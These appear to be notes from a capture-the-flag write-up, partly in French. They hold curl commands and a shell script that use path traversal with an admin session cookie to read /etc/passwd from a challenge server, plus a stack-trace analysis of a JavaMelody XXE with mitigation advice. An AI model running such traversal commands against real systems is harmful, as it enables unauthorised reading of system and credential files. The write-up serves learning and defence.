./prefix-lol ./prefix ./prefix/lol ``` / -> 500 ./ -> 500 ../ -> 500 a/ -> 500 l/ol -> 500 ``` ``` curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -F "file=@/home/user/EICAR;filename=..................etcpasswd" ``` ``` curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -G --data-urlencode 'filename=../../../../../../../../../etc/passwd' ``` ```sh= FILENAME=$1 FILENAME_CLEAN=$(echo $FILENAME | tr -d '/') curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -F "file=@/tmp/a;filename=$FILENAME_CLEAN" &>/dev/null curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: 
session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -G --data-urlencode "filename=$FILENAME" --output - ``` ## Catcontrol ``` "http-8080-133" daemon prio=5 RUNNABLE java.net.SocketInputStream.socketRead0(Native Method) java.net.SocketInputStream.socketRead(SocketInputStream.java:116) java.net.SocketInputStream.read(SocketInputStream.java:170) java.net.SocketInputStream.read(SocketInputStream.java:141) java.io.BufferedInputStream.fill(BufferedInputStream.java:246) java.io.BufferedInputStream.read(BufferedInputStream.java:265) java.io.FilterInputStream.read(FilterInputStream.java:83) com.sun.org.apache.xerces.internal.impl.XMLEntityManager$RewindableInputStream.read(XMLEntityManager.java:2892) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:673) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1300) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1237) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.startPE(XMLDTDScannerImpl.java:707) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.skipSeparator(XMLDTDScannerImpl.java:2073) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDecls(XMLDTDScannerImpl.java:2036) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:362) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1103 
com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1050) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$PrologDriver.next(XMLDocumentScannerImpl.java:938) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:606) com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(XMLNSDocumentScannerImpl.java:117) com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(XMLStreamReaderImpl.java:558) com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.nextTag(XMLStreamReaderImpl.java:1238) net.bull.javamelody.PayloadNameRequestWrapper.parseSoapMethodName(PayloadNameRequestWrapper.java:248) net.bull.javamelody.PayloadNameRequestWrapper.initialize(PayloadNameRequestWrapper.java:104) net.bull.javamelody.MonitoringFilter.createRequestWrapper(MonitoringFilter.java:334) net.bull.javamelody.MonitoringFilter.doFilter(MonitoringFilter.java:225) net.bull.javamelody.MonitoringFilter.doFilter(MonitoringFilter.java:215) org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235) org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206) org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:233) org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191) org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102) org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109) org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:299) org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:857) org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:588) org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:489) 
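java.lang.Thread.run(Thread.java:745)
```

Stack trace utilisée par un type qui a pwn ?

XXE -> ??? -> RCE

Lecture de la trace ci-dessus : le thread attend sur une socket pendant que `XMLDTDScannerImpl.startPE` résout une entité paramètre de la DTD, appelé depuis `PayloadNameRequestWrapper.parseSoapMethodName` (JavaMelody). Le corps de la requête est donc parsé avec DTD et entités externes actives, ce qui colle avec un XXE. L'étape XXE -> RCE n'apparaît pas dans ces traces.

Beaucoup de FTP dans les logs (probablement des entités externes en `ftp://` résolues par le parseur) :

```
sun.net.ftp.impl.FtpClient.openDataConnection(FtpClient.java:769)
sun.net.ftp.impl.FtpClient.getFileStream(FtpClient.java:1283)
sun.net.www.protocol.ftp.FtpURLConnection.getInputStream(FtpURLConnection.java:428)
```

Mitigation : désactiver `XMLInputFactory.SUPPORT_DTD` et `XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES` sur le parseur StAX, ou mettre JavaMelody à jour ; surveiller les connexions FTP sortantes du serveur d'application.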